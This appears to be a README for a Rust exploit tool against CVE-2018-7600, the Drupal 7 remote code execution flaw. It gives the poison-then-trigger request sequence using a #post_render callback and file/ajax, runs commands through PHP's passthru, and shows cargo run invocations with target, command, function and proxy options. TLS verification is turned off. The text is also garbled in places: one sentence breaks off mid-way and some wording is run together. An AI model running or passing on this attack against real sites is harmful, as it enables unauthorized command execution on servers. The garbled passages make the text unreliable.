Share
## https://sploitus.com/exploit?id=4A338204-0FAE-5DE3-8C0D-A7AAB81EF3F3
# CVE-2018-7600 - Drupal 7 Remote Code Execution
[![Rust](https://img.shields.io/badge/rust-%23000000.svg?style=for-the-badge&logo=rust&logoColor=white)](https://www.rust-lang.org/)[![Security](https://img.shields.io/badge/Security-CVE--2018--7600-red?style=for-the-badge)](https://vulners.com/cve/CVE-2018-7600)

A Rust implementation of the CVE-2018-7600 exploit targeting vulnerable Drupal 7 installations (` with the `form_build_id` in the POST body. When Drupal renders the cached element, the `#post_render` callback executes with attacker-controlled markup, enabling command execution.

### Description
This Rust CLI constructs performs the two-step sequence (poison then trigger) against a target Drupal 7 site request parameters, parses the HTML response for `form_build_id`, and then triggers the `file/ajax` endpoint to execute the function specified by the attacker.

Because the client disables certificate verification (to mirror the original PoC which passed `verify=False`), the tool will work against targets using self-signed or otherwise invalid TLS certs. This behaviour can be changed in the source if you prefer to require valid certificates.

## Usage

Basic usage (default command is `whoami`, default function is `passthru`):
```zsh
cargo run -- -u http://target.com/
```
 
Run a custom command and function:
```zsh
cargo run -- -u http://target.com/ -c "whoami" -f "passthru"
```

Use an HTTP/S proxy (format: `http://127.0.0.1:8080/`):
```zsh
cargo run -- -u http://target.com/ -p http://127.0.0.1:8080/
```

CLI options summary:

- `-u`, `target`: URL of the target Drupal site (e.g. `http://target.com/`).
- `-c`, `--command`: Command to execute on target (default: `whoami`).
- `-f`, `--function`: PHP function to use as the attack vector (default: `passthru`).
- `-p`, `--proxy`: Optional proxy URL to route requests through.
 
Example full flow:
1. Poison the `user/password` form, inserting `#post_render` callback and `#markup` containing the command.
2. Parse the response to find `form_build_id` inside `form#user-pass`.
3. POST to `?q=file/ajax/name/#value/` with the `form_build_id` to trigger rendering and execute the command.

## Disclaimer
This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to.